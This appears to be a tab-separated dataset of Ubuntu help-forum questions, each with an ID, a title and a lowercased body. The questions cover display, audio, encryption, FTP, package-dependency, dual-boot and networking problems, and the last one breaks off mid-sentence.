461244	ubuntu sdk qml how to change the background color of textfield	i have a situation where the background color of my qml app mainview causes the textfield entry to have grey lettering on equally dark brown background . this makes it almost impossible to read what text has been entered into the textfield . when entering text it 's fine because the background turns white and the dark text is now visible , but when a texfield is n't selected the text is unreadable . is there a way to change the background color of a textfield ? i 've already tried changing the text color , and it works when not entering text , but as soon as i click in the textfield to enter text i ca n't read it anymore because the textfield background color turns white and the text color is also very light . anyone have a solution to this issue they could suggest ? thanks
461245	monitor randomly reboots - could it be ubuntu fault ?	recently bought a new widescreen display/tv combo for my ubuntu system . it has a weird issue that when viewing huge colorful images fullscreen ( or close to full screen ) display reboots - turns off , displays logo and continues to display whatever it was displaying before . sometimes i can get into infinite reboot loop . tried connecting it through hdmi < - > dvi and vga - results are the same . also tried using integrated video card - it still crashes . has anyone seen similar issues ? is it possible , that this is a defect of pc/os combo , but not display ? correct me if i 'm wrong , but it seems impossible , that pc could crash monitor . the same pc/os combination works normally with my old 17 '' lcd . maker says that hardware is not faulty . os : ubuntu 13.10 32-bit video : ati radeon hd 2400 xt ( vga , dvi ) update : a little follow up - same issues on windows system on different pc . i narrowed it to a set of images , when i quickly switch between them monitor freezes after some time . now i 'm wondering how is it possible for specific images to force monitor reboot ?
461257	crackling during playback with external dac	i 've been struggling with this for an entire day to no avail . nothing i tried helped . here 's the situation : the dac ( fiio olympus e10 ) works flawlessly in windows . in ubuntu i get random crackling and popping during playback akin to an old vinyl . the onboard sound works fine , it 's only with the dac . this only happens on my desktop ( both in ubuntu 13.04 and xubuntu 14.04 ) . on my laptop ( ubuntu 13.04 ) there is no such issue , the dac just works . the intensity of the crackling varies - sometimes it 's not instantly noticeable . occasionally it gets extremely bad when i scroll with the mouse . the issue seems to go away completely when i run `` stress -c 4 '' . i tried many things : nothing i did to alsa or pulseaudio settings had an effect on it , and i 've tried everything i could find on the internet that could be related to the problem . i tried different usb slots and even removed all other usb devices , no effect . i disabled cpu power saving options in bios , no effect . i disabled onboard sound and blacklisted hdmi audio on my video card , making the dac the only audio device . did n't help . anyone got any idea what could be the problem here ? i 'm at my wit 's end .
461260	how to mount a host drive as a hard drive in windows 8 when running inside vmware	i am using vmware 6.2 ( non-commercial version ) to use win 8 on ubuntu 14.04 . i want to add my drive ( /dev/sda4 ) as a drive in win 8 which is running on vmware . so when i add a hardware on the vmware ... it asks to run vm ware on root privilege .
461263	ubuntu not running unity after login	i am running ubuntu 12.04 on a wubi installation . after logging in i can only view my wallpaper . it does not show any of the normal gui taskbars or menus . using ctrl+alt+t does not bring up a terminal , but i can switch to a console with ctrl+alt+f1-6 . i have enabled the unity 3d plugin in ccsm , but the same issue still persists . i am running on an intel i7 and an nvidia graphics card . i have attempted to reinstall my graphics drivers , but that also did not fix the issue . running to check if unity is compatible yields all yeses . i have tried sudo apt-get install ubuntu-desktop reinstall and i also removed and reinstalled unity . the login screen 's top right corner is also messed up . the icons appear with white text on a white background with only shadows to distinguish them from each other . a solution to this problem would be appreciated .
461264	do not ask `` run or display '' for certain file extensions	i 'm pretty new to ubuntu and already stuck on something simple : when trying to open a plain text file with the file extension .txt , it always asks whether i want to run or display the file . now , if the file has the ending .txt , i always want it to be displayed in gedit . i never want to run it . is there a way to skip that dialogue ? i think the file manager is nautilus . to be specific : i do n't want to skip the dialogue for all plain text documents ! just for those with the ending `` .txt '' . glad if someone could help me , its pretty annoying since i 'm editing a lot of text files : - )
461265	wi-fi led is off when wi-fi is on	my wi-fi led on asus ux31e only turns on after i press fn+f2 , even though wi-fi turns on automatically on startup . so wi-fi led is off when wi-fi is on . /sys/class/leds/ath9k-phy0/brightness shows correct values . i 've tried changing it to no avail . note : it might have to do with having blacklisted and killed bluetooth . echo 'blacklist btusb ' > > /etc/modprobe.d/blacklist.conf echo 'rfkill block bluetooth ' > > /etc/rc.local in grub grub_cmdline_linux_default= '' splash quiet acpi_osi= ' ! windows 2012 ' '' my device is 02:00.0 network controller [ 0280 ] : qualcomm atheros ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 ) how can i reverse the behavior ?
461269	what to do about /dev/mapper/cryptswap1 not being ready ?	okay , i know it seems like this post has been shared a thousand times , but here 's my situation : 1 ) i have a 1tb portable hd that i use to boot ubuntu on the school 's computers sometimes . 2 ) i just installed 14.04 lts , and , feeling overly confident , decided to encrypt my home folder . 3 ) i also decided to put 25gb of swap on it , because with an entire tb , why not . every so often , about half the time actually , i get the error message in the question above whilst booting . this happens at random , and i ca n't tell whether or not it works half the time , or only gives me the error message half the time , and just never works.\ thanks in advance , adam
461270	reboot always redirects to initramfs shell	i installed ubuntu 14.04 on dell poweredge 2800 raid controller 4e/di ( with 6 hard drives , i chosed raid5 ) . i encrypted the disks using luks ( cryptsetup ) . after installation , each time i reboot the initramfs shell prompts . why does this happen ? more precisely , during the installation process , ubuntu displayed a message which states that no hard drive found . if you know the necessary driver for the functioning of your hard drive , select it from below . i do not know which driver to select , so i tried the items one after the other until one of them is accepted . on the initramfs shell , ls shows only these directories/files : lvm , udev , console-setup , nsswitch.conf mtab , < br > `modprobe.d fonts , passwd` and `default` ls and lspci give me this ( screenshot ) :
461271	ubuntu 14.04 upgrade - stopped halfway though	laptop ran out of battery halfway though upgrade . fuse blew in charger which i did n't realise until the laptop switched off . now have a laptop which is half 13.10 and half 14.04 but it says there are no updates to do , therefore how do i upgrade the whole computer ?
461275	upgrade x to saucy on precise	i 've installed the saucy latest kernel with by installing the following package : linux-image-generic-lts-saucy everything is working great , no problems . i am , however , running into issues with x and with xrandr and a displaylink usb device . it has been recommended that i upgrade to a later xrandr version which contains support for udl and udlfb which will hopefully be able to make my displaylink device work . it 's already being successfully detected by my kernel , as you can see in the logs here : [ 4784.297998 ] usb 3-1.4 : device descriptor read/8 , error -110 [ 4784.419818 ] usb 3-1.4 : device descriptor read/8 , error -32 [ 4784.594743 ] usb 3-1.4 : new high-speed usb device number 7 using xhci_hcd [ 4784.617385 ] usb 3-1.4 : new usb device found , idvendor=17e9 , idproduct=410d [ 4784.617397 ] usb 3-1.4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 4784.617403 ] usb 3-1.4 : product : sabrent usb-hdmi [ 4784.617408 ] usb 3-1.4 : manufacturer : displaylink [ 4784.617412 ] usb 3-1.4 : serialnumber : 442631 [ 4784.619556 ] udlfb : displaylink sabrent usb-hdmi - serial # 442631 [ 4784.619565 ] udlfb : vid_17e9 & pid_410d & rev_0101 driver 's dlfb_data struct at ffff880036313000 [ 4784.619569 ] udlfb : console enable=1 [ 4784.619571 ] udlfb : fb_defio enable=1 [ 4784.619573 ] udlfb : shadow enable=1 [ 4784.619935 ] udlfb : vendor descriptor length:27 data:27 5f 01 0025 00 04 04 01 00 03 [ 4784.619943 ] udlfb : dl chip limited to 2080000 pixel modes [ 4784.620019 ] udlfb : allocated 4 65024 byte urbs [ 4784.759913 ] udlfb : 1920x1080 @ 60 hz valid mode [ 4784.759916 ] udlfb : 720x400 @ 70 hz valid mode [ 4784.759918 ] udlfb : 640x480 @ 60 hz valid mode [ 4784.759919 ] udlfb : 640x480 @ 67 hz valid mode [ 4784.759920 ] udlfb : 640x480 @ 72 hz valid mode [ 4784.759921 ] udlfb : 640x480 @ 75 hz valid mode [ 4784.759922 ] udlfb : 800x600 @ 56 hz valid mode [ 4784.759923 ] udlfb : 800x600 @ 60 hz valid mode [ 4784.759924 ] udlfb : 800x600 @ 72 hz valid mode [ 4784.759925 ] udlfb : 800x600 @ 75 hz valid mode [ 4784.759926 ] udlfb : 832x624 @ 75 hz valid mode [ 4784.759927 ] udlfb : 1024x768 @ 60 hz valid mode [ 4784.759929 ] udlfb : 1024x768 @ 70 hz valid mode [ 4784.759930 ] udlfb : 1024x768 @ 75 hz valid mode [ 4784.759931 ] udlfb : 1280x1024 @ 75 hz valid mode [ 4784.759933 ] udlfb : 1152x864 @ 75 hz valid mode [ 4784.759934 ] udlfb : 1680x1050 @ 60 hz valid mode [ 4784.759935 ] udlfb : 1600x1200 @ 60 hz valid mode [ 4784.759936 ] udlfb : 1600x900 @ 60 hz valid mode [ 4784.759937 ] udlfb : 1440x900 @ 60 hz valid mode [ 4784.759939 ] udlfb : 1400x1050 @ 60 hz valid mode [ 4784.759940 ] udlfb : 1280x1024 @ 60 hz valid mode [ 4784.759941 ] udlfb : 1280x960 @ 60 hz valid mode [ 4784.759942 ] udlfb : 1280x800 @ 60 hz valid mode [ 4784.759944 ] udlfb : reallocating framebuffer . addresses will change ! [ 4784.761287 ] udlfb : 1920x1080 @ 60 hz valid mode [ 4784.761290 ] udlfb : set_par mode 1920x1080 [ 4784.766503 ] udlfb : displaylink usb device /dev/fb1 attached . 1920x1080 resolution . using 8104k framebuffer memory the only problem is that the old version of xrandr and x which i 'm running wo n't allow me to have plug-and-play support of the monitor , i 'll have to manually configure my xorg.conf file . is there a way for me to upgrade to saucy 's x and xrandr packages without destroying everything ? i 'm okay with getting my hands dirty . my main monitor is being driven by intel graphics , so i 'm not worried about conflicting with proprietary graphics .
461276	with lauch icons on left , part of dialog falls of screen to right	as a very new user of ubuntu i find that loss of a strip of text on the right caused by the permanent display of the icons left side vertically to be a nuisance . is there any way these icons can be displayed across the bottom thus releasing the full screen display area ?
461278	`` the package libcheese7 : i386 3.10.2-0ubuntu1~saucy2 ca n't be configured since the version of libcheese7 : amd64 is different ( 3.6.2-0ubuntu3 )	when i try to install any software i obtain this error : libcheese7 : i386 libcheese-gtk23 : i386 empathy mcp-account-manager-uoa account-plugin-aim account-plugin-jabber account-plugin-salut account-plugin-yahoo gnome-contacts gnome-control-center nautilus-sendto-empathy e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i use this machine : no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy with the version of ubuntu is : ubuntu smp tue dec 3 01:25:33 utc 2013 i686 i686 i686 gnu/linux when i make : sudo apt-get install -f i obtain : lecture des listes de paquets ... fait construction de l'arbre des dépendances lecture des informations d'état ... fait 0 mis à jour , 0 nouvellement installés , 0 à enlever et 535 non mis à jour . 11 partiellement installés ou enlevés . après cette opération , 0 o d'espace disque supplémentaires seront utilisés . dpkg : erreur de traitement de libcheese7 : i386 ( -- configure ) : le paquet libcheese7 : i386 3.10.2-0ubuntu1~saucy2 ne peut pas être configuré parce que la version de libcheese7 : amd64 est différente ( 3.6.2-0ubuntu3 ) dpkg : erreur de traitement de libcheese-gtk23 : i386 ( -- configure ) : le paquet libcheese-gtk23 : i386 3.10.2-0ubuntu1~saucy2 ne peut pas être configuré parce que la version de libcheese-gtk23 : amd64 est différente ( 3.6.2-0ubuntu3 ) dpkg : des problèmes de dépendances empêchent la configuration de empathy : empathy dépend de libcheese-gtk23 ( > = 3.4.0 ) ; cependant : le paquet libcheese-gtk23 : i386 n'est pas encore configuré . dpkg : erreur de traitement de empathy ( -- configure ) : problèmes de dépendances - laissé non configuré aucun rapport « apport » n'a été créé car le message d'erreur indique une erreur consécutive à un échec précédent . dpkg : des problèmes de dépendances empêchent la configuration de mcp-account-manager-uoa : mcp-account-manager-uoa dépend de empathy ( = 3.10.2-0ubuntu1~saucy3 ) ; cependant : le paquet empathy n'est pas encore configuré . mcp-account-manager-uoa dépend de libcheese-gtk23 ( > = 3.0.1 ) ; cependant : le paquet libcheese-gtk23 : i386 n'est pas encore configuré . dpkg : erreur de traitement de mcp-account-manager-uoa ( -- configure ) : problèmes de dépendances - laissé non configuré dpkg : des problèmes de dépendances empêchent la configuration de account-plugin-aim : account-plugin-aim dépend de empathy ( = 3.10.2-0ubuntu1~saucy3 ) ; cependant : le paquet empathy n'est pas encore configuré . account-plugin-aim dépend de mcp-account-manager-uoa ; cependant : le paquet mcp-account-manager-uoa n'est pas encore configuré . dpkg : erreur de traitement de account-plugin-aim ( -- configure ) : problèmes de dépendances - laissé non configuré dpkg : des problèmes de dépendances eaucun rapport « apport » écrit car maxreports a déjà été atteint aucun rapport « apport » écrit car maxreports a déjà été atteint mpêchent la configuration de account-plugin-jabber : account-plugin-jabber dépend de empathy ( = 3.10.2-0ubuntu1~saucy3 ) ; cependant : le paquet empathy n'est pas encore configuré . account-plugin-jabber dépend de mcp-account-manager-uoa ; cependant : le paquet mcp-account-manager-uoa n'est pas encore configuré . dpkg : erreur de traitement de account-plugin-jabber ( -- configure ) : problèmes de dépendances - laissé non configuré dpkg : des problèmes de dépendances empêchent la configuration de account-plugin-salut : account-plugin-salut dépend de empathy ( = 3.10.2-0ubuntu1~saucy3 ) ; cependant : le paquet empathy n'est pas encore configuré . account-plugin-salut dépend de mcp-account-manager-uoa ; cependant : aucun rapport « apport » écrit car maxreports a déjà été atteint le paquet mcp-account-manager-uoa n'est pas encore configuré . dpkg : erreur de traitement de account-plugin-salut ( -- configure ) : problèmes de dépendances - laissé non configuré dpkg : des problèmes de dépendances empêchent la configuration de account-plugin-yahoo : account-plugin-yahoo dépend de empathy ( = 3.10.2-0ubuntu1~saucy3 ) ; cependant : aucun rapport « apport » écrit car maxreports a déjà été atteint le paquet empathy n'est pas encore configuré . account-plugin-yahoo dépend de mcp-account-manager-uoa ; cependant : le paquet mcp-account-manager-uoa n'est pas encore configuré . dpkg : erreur de traitement de account-plugin-yahoo ( -- configure ) : problèmes de dépendances - laissé non configuré aucun rapport « apport » écrit car maxreports a déjà été atteint dpkg : des problèmes de dépendances empêchent la configuration de gnome-contacts : gnome-contacts dépend de libcheese-gtk23 ( > = 3.4.0 ) ; cependant : le paquet libcheese-gtk23 : i386 n'est pas encore configuré . gnome-contacts dépend de libcheese7 ( > = 3.0.1 ) ; cependant : le paquet libcheese7 : i386 n'est pas encore configuré . dpkg : erreur de traitement de gnome-contacts ( -- configure ) : problèmes de dépendances - laissé non configuré aucun rapport « apport » écrit car maxreports a déjà été atteint dpkg : des problèmes de dépendances empêchent la configuration de gnome-control-center : gnome-control-center dépend de libcheese-gtk23 ( > = 3.4.0 ) ; cependant : le paquet libcheese-gtk23 : i386 n'est pas encore configuré . gnome-control-center dépend de libcheese7 ( > = 3.0.1 ) ; cependant : le paquet libcheese7 : i386 n'est pas encore configuré . dpkg : erreur de traitement de gnome-control-center ( -- configure ) : problèmes de dépendances - laissé non configuré aucun rapport « apport » écrit car maxreports a déjà été atteint dpkg : des problèmes de dépendances empêchent la configuration de nautilus-sendto-empathy : nautilus-sendto-empathy dépend de empathy ( = 3.10.2-0ubuntu1~saucy3 ) ; cependant : le paquet empathy n'est pas encore configuré . nautilus-sendto-empathy dépend de libcheese-gtk23 ( > = 3.0.1 ) ; cependant : le paquet libcheese-gtk23 : i386 n'est pas encore configuré . dpkg : erreur de traitement de nautilus-sendto-empathy ( -- configure ) : problèmes de dépendances - laissé non configuré aucun rapport « apport » écrit car maxreports a déjà été atteint des erreurs ont été rencontrées pendant l'exécution : libcheese7 : i386 libcheese-gtk23 : i386 empathy mcp-account-manager-uoa account-plugin-aim account-plugin-jabber account-plugin-salut account-plugin-yahoo gnome-contacts gnome-control-center nautilus-sendto-empathy e : sub-process /usr/bin/dpkg returned an error code ( 1 ) why this error and how can i correct it please ?
461280	no secure boot option - dual boot	after spending 4 days trying to set up my laptop with dual-boot , i am now asking for help . i 've looked at some videos and tutorials and have found resources relating to my model of my notebook , but mine is still different . i have an asus x202e . the bios is updated to the latest version . when i go into the bios , i can not find any secure boot or csm launch option . i have changed many of the options and settings but have had no success . here are the things i have tried : installed windows 8 , and then i try to install ubuntu . during ubuntu install partitioning section , there were no visible ntfs partitions . installed ubuntu with the partition / efi , then tried to install win8 . result , when installing windows 8 the installer says that the system is in hd and gpt can not install windows 8 . installed ubuntu without partition / efi . result : ubuntu does not start , neither os is detected by the system , it asks to install an operating system , or select a system . then i installed windows 8 , and it only boots windows 8 . under windows 8 i installed easy bcd , and created two boot options , one for windows and one for ubuntu , but when i choose ubuntu it still does not start . i need to have a dual-boot system . i really want to start using linux , but i still need to use some windows software .
461283	no tty present and no askpass program specified with `ssh -a`	i 'm trying the following command : ssh -a user @ server 'bash -s ' < mylocalscript.sh but get the annoying sudo : no tty present and no askpass program specified when the script reaches a sudo . according to man ssh , -a is supposed to forward local authentication , so it should be able to use sudo on the remote server.. what am i doing wrong/not understanding.. ?
461285	vsftpd server no connect on virtual server	i have a virtual machine running ubuntu in amazon cloud server . this machine installed via apt apache2 + php5 + mysql to serve my website and everything is running perfectly . however , with no means to run an ftp server so i can update the website whenever you need . i tried both with vsftpd as proftpd , and none of them work . the problem is that does not work or if i tenter connect locally to test remotely is also impossible . using the netstat -atpn command can not see any reference to port 20 or 21 , used by ftp . any connection attempt i try to ftp returns me this message : connection refused how can i solve this ? do not want to be using sftp via ssh to upload my files . below the contents of my vsftpd.conf file : listen=yes anonymous_enable=no local_enable=yes write_enable=yes local_umask=022 dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=no chroot_local_user=yes secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key pasv_enable=yes pasv_addr_resolve=yes pasv_max_port=12100 pasv_min_port=12000 pasv_address=xxx.xxx.xxx.xxx userlist_enable=yes userlist_file=/etc/vsftpd.userlist userlist_deny=no allow_writeable_chroot=yes
461287	is it possible to define a list in the terminal ?	since it is allowed to do a=5 ; echo $ a , i was wondering whether or not it is possible to declare lists and other data structures ( such as tuples , dictionaries ) in the terminal ? and if so , are they mutable or they must be unset first ?
461289	repairing windows 8 from ubuntu usb boot	my student has a windows 8 netbook ( no cd/dvd drive ) which reports `` no operating system '' when turned on . she has has a windows 8 repair dvd ( not very useful without a drive ! ) and a copy of that dvd in a folder on a usb - which also will not boot that system . i can boot the system with my ubuntu 9.04 usb and read the hard drive and her usb - both look fine at first glance . any suggestions on what to look for to repair the ability of windows to boot itself ? ( personally , just installing ubuntu would probably be more reliable and increase usability - but it 's not my machine and 9.04 does n't support her wireless card . )
461292	not iso file as a input for virtualbox	i have windows xp boot able cd . it is not xp 's iso file . can i use this one to pass to my downloaded virtual box in ubuntu ? i got iso files to virtual box but this one is not iso . just a boot able.is it possible ?
461293	can i safely uninstall older versions of python after upgrading ?	i upgraded to ubuntu 14 and i see i have a number of python folders ... . python 2.7 and so on up to python 3.4 . do i need to leave all the older ones alone or can they be deleted ? i see that somebody uninstalled 2.7 and now they are having problems .
461294	ubuntu 14.04 ca n't click or switch windows	i 've just updated to 14.04 . after a short period simple keyboard shortcuts stop working . also , my mouse randomly decides to stop functioning so much so that i can only move the cursor and not click . when i press ctrl+alt+f2 and then switch both the mouse and the keyboard are functioning again . is there anything that could be causing this problem or is it likely to be my peripherals ? cheers
461298	google music manager - log location ?	my google music manager is stuck uploading and wo n't upload the last 324 songs . i 've tried this solution , which has n't helped . a work around suggests manually uploading the problamatic files , or looking for something odd about the filenames ( e.g. ' characters ) . how can i find out what the files that are failing to upload are ?
461300	lubuntu 12.04 remove shortcut	every time i press ctrl + space it changes the system language , and i come from the game to the desktop . how can i disable that i have stayed in leafpad ~ / .config / openbox / lubuntu-rc.xml looked but found nothing . can someone help me , i can not really play like that . sorry for my bad english . 2nd question how can i add a shortcut that when i press the windows key i come from the game to the destop ?
461305	ntpdate `` no server suitable for synchronization found ''	i have tried to disable the firewall and allow the port 123 as explained in other questions , but it didnt help me , it keeps telling me $ sudo ntpdate -u pool.ntp.org 5 may 05:41:40 ntpdate [ 3614 ] : no server suitable for synchronization found
461306	why do i see amd/ati graphics driver updates when i have an intel card ( gma500 ) ? what should i do with them ?	my system have gma500 lspci 00:00.0 host bridge : intel corporation system controller hub ( sch poulsbo ) ( rev 07 ) 00:02.0 vga compatible controller : intel corporation system controller hub ( sch poulsbo ) graphics controller ( rev 07 ) 00:1b.0 audio device : intel corporation system controller hub ( sch poulsbo ) hd audio controller ( rev 07 ) 00:1c.0 pci bridge : intel corporation system controller hub ( sch poulsbo ) pci express port 1 ( rev 07 ) 00:1d.0 usb controller : intel corporation system controller hub ( sch poulsbo ) usb uhci # 1 ( rev 07 ) 00:1d.1 usb controller : intel corporation system controller hub ( sch poulsbo ) usb uhci # 2 ( rev 07 ) 00:1d.2 usb controller : intel corporation system controller hub ( sch poulsbo ) usb uhci # 3 ( rev 07 ) 00:1d.7 usb controller : intel corporation system controller hub ( sch poulsbo ) usb ehci # 1 ( rev 07 ) 00:1e.0 sd host controller : intel corporation system controller hub ( sch poulsbo ) sdio controller # 1 ( rev 07 ) 00:1f.0 isa bridge : intel corporation system controller hub ( sch poulsbo ) lpc bridge ( rev 07 ) 00:1f.1 ide interface : intel corporation system controller hub ( sch poulsbo ) ide controller ( rev 07 ) 02:00.0 network controller : qualcomm atheros ar928x wireless network adapter ( pci-express ) ( rev 01 ) but in the softwere updater ( lubuntu 14.04 ) it shows update for x.org x server -- amd/ati display driver x.org x server amd/ati radeon display driver what should i do , update them or not ? ?
461307	wired connection yields no internet	i have looked through several other pages that have this same problem , but there are n't solutions . at work when i connect to the ethernet cable ( the only way to get internet ) , the system tells me i have a connection of 100 mb/s , but no browser gives me internet access . i have my computer dual-booted with chromeos , which connects to the ethernet just fine . wireless connections work without problems ( where they are available ) . do i need to install drivers ? if so , how do i find which one ( s ) i need ? i just upgraded to ubuntu 14.04 from 13.10 . thanks in advance .
461316	how to construct sunburst charts in gnumeric	i 'm trying to arrange species into a sunburst ( multilevel pie or ring ) chart that summarizes their numbers at genus , family level and so on . i can not seem to realize that with gnumeric ( and neither with libreoffice calc for that matter ) as i happen to have too many `` dimensions '' . here is an example of the gnumeric manual that shows how to use a sunburst chart : my data however comes in such format that i do n't have the same entry across all rings : kingdom phylum class species_count animalia arthropoda insecta 2 animalia arthropoda malacostraca 13 animalia bryozoa gymnolaemata 59 bacteria cyanobacteria cyanophyceae 8 is it possible to realize that within gnumeric or libreoffice ?
461321	i installed lubuntu alongside windows xp , how do i remove lubuntu without harming xp	when i installed lubuntu i did n't even think about it installing on the same partition as windows xp . how do i uninstall lubuntu without harming the windows xp os or any of the documents and stuff ?
461322	matlab r2014a on ubuntu 14.04 install issue	i am trying to install matlab r2014a on ubuntu 14.04 lts . i download the .iso file ( from my university ) and mount it using disk image mounter . then i open a terminal , switch to the directory where the image is mounted , and enter this command : sudo ./install then it runs a bunch of lines that all say cp : failed to extend 'some stuff ' or cp : error reading 'somestuff ' and then input/output error . what am i doing wrong ? thanks for any help .
461325	detecting lg kp500 phone and asus memo pad in ubuntu 14.04	i had a couple of devices that i were automatically detected in ubuntu 12.04 : an lg kp500 ( or `` cookie '' ) phone and the asus memo pad 10 . using ubuntu 14.04 these devices are not detected and i can not connect to them . how can i connect to these devices in ubuntu 14.04 ? why are they no longer detected ? i do not recall that drivers were removed during the upgrade from 12.04 and i do not see why they should be removed .
461326	monodevelop fails to compile vb ( vbc : pathtotool parameter can not be null )	i 'm trying to use monodevelop to compile visual basic in ubuntu . i 've installed monodevelop 4.2.2 as instructed in this thread from `` ppa : ermshiperete/monodevelop '' . however i can not build the sample visual basic project . with the following error : /opt/monodevelop/lib/mono/4.5/microsoft.visualbasic.targets : error : error executing task vbc : argument can not be null . parameter name : pathtotool ( test ) i 'm clearly missing some setup to build vb projects , any ideas how i can get them working ? i 've tried : reading the mentioned vb targets file does n't show obviously where i should define a pathtotool parameter and i 'm not exactly sure the visual basic tools it 's referring to are even installed ( though i do n't know where to look . ) using a vm with visual studio . this works but it 's annoying . using a better programming language ; colleges choice .
461327	how to make luks partition auto-mounted at start-up ?	what i have : 1st hdd ( /dev/sda ) with luks crypt partition ( /dev/sda5 ) with lvm in it ( /dev/mapper/sda5_crypt ) . lvm contains system root ( /dev/mapper/ts1 -- vg-root ) and swap ( /dev/mapper/ts1 -- vg-swap_1 ) volumes . 2nd hdd ( /dev/sdb ) with luks crypt partition ( /dev/sdb1 ) with ext4 fs ( /dev/mapper/backups_crypt ) . usb flash drive with a key-file : /dev/disk/by-label/redprospect : /ts1-keyfile ubuntu server 14.04 ( 64 bit ) installed on /dev/mapper/ts1 -- vg-root . /etc/crypttab sda5_crypt uuid=624976e3-0fd6-4e9c-a3c6-83a5dc35c3e7 /dev/disk/by-label/redprospect : /ts1-keyfile luks , discard , keyscript=/lib/cryptsetup/scripts/passdev backups_crypt uuid=be494357-2f3d-42a8-bee1-8ccc0ca3fa69 /dev/disk/by-label/redprospect : /ts1-keyfile luks , discard , keyscript=/lib/cryptsetup/scripts/passdev /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ts1 -- vg-root / ext4 errors=remount-ro 0 1 uuid=a576f15d-2766-4af8-8cbd-90f5e8427774 /boot ext2 defaults 0 2 /dev/mapper/ts1 -- vg-swap_1 none swap sw 0 0 uuid=ca86ec18-c1c0-424a-9586-726559718c1f /backups ext4 defaults 0 2 lsblk name maj : min rm size ro type mountpoint sda 8:0 0 1.8t 0 disk ├─sda1 8:1 0 243m 0 part /boot ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 1.8t 0 part └─sda5_crypt ( dm-0 ) 252:0 0 1.8t 0 crypt ├─ts1 -- vg-root ( dm-1 ) 252:1 0 10g 0 lvm / ├─ts1 -- vg-swap_1 ( dm-2 ) 252:2 0 6g 0 lvm [ swap ] ├─ ... other lvs . sdb 8:16 0 931.5g 0 disk └─sdb1 8:17 0 931.5g 0 part └─backups_crypt ( dm-6 ) 252:6 0 931.5g 0 crypt /backups sdc 8:32 1 1.9g 0 disk └─sdc1 8:33 1 1.9g 0 part blkid /dev/sda1 : uuid= '' a576f15d-2766-4af8-8cbd-90f5e8427774 '' type= '' ext2 '' /dev/sda5 : uuid= '' 624976e3-0fd6-4e9c-a3c6-83a5dc35c3e7 '' type= '' crypto_luks '' /dev/sdb1 : uuid= '' be494357-2f3d-42a8-bee1-8ccc0ca3fa69 '' type= '' crypto_luks '' /dev/sdc1 : label= '' redprospect '' uuid= '' c2d42ff4-965d-444f-8afd-c1c14a09fc51 '' type= '' ext4 '' /dev/mapper/sda5_crypt : uuid= '' etb2h4-nk0j-agnx-co79-izck-9axt-eco11j '' type= '' lvm2_member '' /dev/mapper/ts1 -- vg-root : label= '' ts1-root '' uuid= '' ff4efe0e-8161-4af3-a234-c9b16d9a2a40 '' type= '' ext4 '' /dev/mapper/ts1 -- vg-swap_1 : uuid= '' ebd4eb66-f899-4dee-84af-f32816206857 '' type= '' swap '' /dev/mapper/backups_crypt : label= '' backups '' uuid= '' ca86ec18-c1c0-424a-9586-726559718c1f '' type= '' ext4 '' after adding backups_crypt record to /etc/crypttab i run update-initramfs -u . with this configuration i have a stop while boot on mounting backups_crypt problem asking for wait or skip ( s ) or manual something ( m ) . when i press skip ( s ) and system boots up , there is opened luks partition /dev/mapper/backups_crypt but not mounted . if i run mount -a then it mounts at /backups as described in /etc/fstab . so , how to make the luks partition ( /dev/mapper/backups_crypt ) auto-mounted at start-up ? upd : i have found a workaround : add noauto option in /etc/fstab for the disk . and add two lines to /etc/rc.local : sleep 5 mount /dev/disk/by-uuid/ca86ec18-c1c0-424a-9586-726559718c1f before exit 0 anyway , why is there such a problem ? why it does n't just work as expected to be ?
461329	dhcpserver configuration , please help	i hope i will get help here . i need to configure an ubuntu dhcp server ( 12.10 ) , the server has 2 network cards . what i need to do is to configure the server as dhcp to give clients ip-addresses ( need at least 8000 ips , it 's for free wifi service ) . what is the best config to accomplish the following please : i need to connect the server to one of our vlans , this vlan should provide internet access to the connected clients ( network : 10.0.19.0 / 24 , gateway 10.0.19.5 , dns 192.168.xx.xx ) . on the other side , i need to create an ip-pool / range for about 8000 ip-addresses ( eg . 172.20.0.0 /16 ) . what is the best option to do this ? the clients who gets ip-address from this range ( 172.200.0 ) must have access to the internet by using the vlan above ( 10.0.19.0 ) . could someone guide me and help to do this . it 's really very important . many thanks madona33
461334	wubi set up and wifi with no ethernet ?	i am extremely new to using ubuntu . while i have a basic grasp of scripting for git/linux and scripting for windows , ubuntu scripting is n't super clear for me . i 'm wanting to set up a wifi driver w/o having to install ethernet ... wondering if that 's even possible ? do you think there may be a way to download an installer from windows and somehow insert it into the ubuntu partition ? really wanting to avoid using ethernet , it would be a huge headache to resolve , and presumably open a can of worms to start disconnecting the wifi router , which is not actually my own . anyways , based on some previous threads , it sounds like i need to try using lspci and lsusb , but i do n't really understand those commands or what to expect thereafter . any advice for getting wifi on ubuntu/wubi partitioned off windows 7 , without ethernet ? also , i saw a youtube recommending i find out the chipset for my wificard ? not really sure how to do that offhand ? suggestions would be much appreciated . thanks ! edit : worst case scenario , would it be possible to get the driver ( if even needed ) from win7 to usb stick to ubuntu ?
461337	one ssd and two hdd . install on ssd and raid 0/1 or lvm for hdds ?	i would like to install ubuntu 14.04 on my pc , but i 'm uncertain on what would be the best for my setup . i have a 128gb ssd ( crucial m4 ) and two 500gb hdds . currently i 'm running windows 8 where i have windows installed on my ssd and with the help of storage spaces i have an additional 1tb d : / drive . i kind of wanted a similar ( or maybe a completely different but better ) setup for ubuntu . the system should be installed on the ssd ( for performance reasons , obviously ) and my documents , music , videos , etc . should be stored on the two hdds . i thought about using a software raid , as it is described in this askubuntu post , also with level 0 or 1 ( i do n't mind missing 500gb of storage , i do n't need that much ) . i also heard about lvm , but even after researching for quite some time i do n't know if would be useful for me and even if , i 'm too insecure to set it up . now i wanted to ask you for help . maybe you have a similar setup or just know what would be the best alternative . thanks in advance for your help . edit 1 : i also have a 500gb external hard drive which i would use for backups .
461341	after i restart on my install of 14.04 my mouse first freezes and then the screen goes blank . any thoughts ?	i just did an install , where i installed ubuntu over my xp . everything appeared to be going good until i was instructed to restart . the login screen came up , then my mouse froze , then the screen went oddly purple
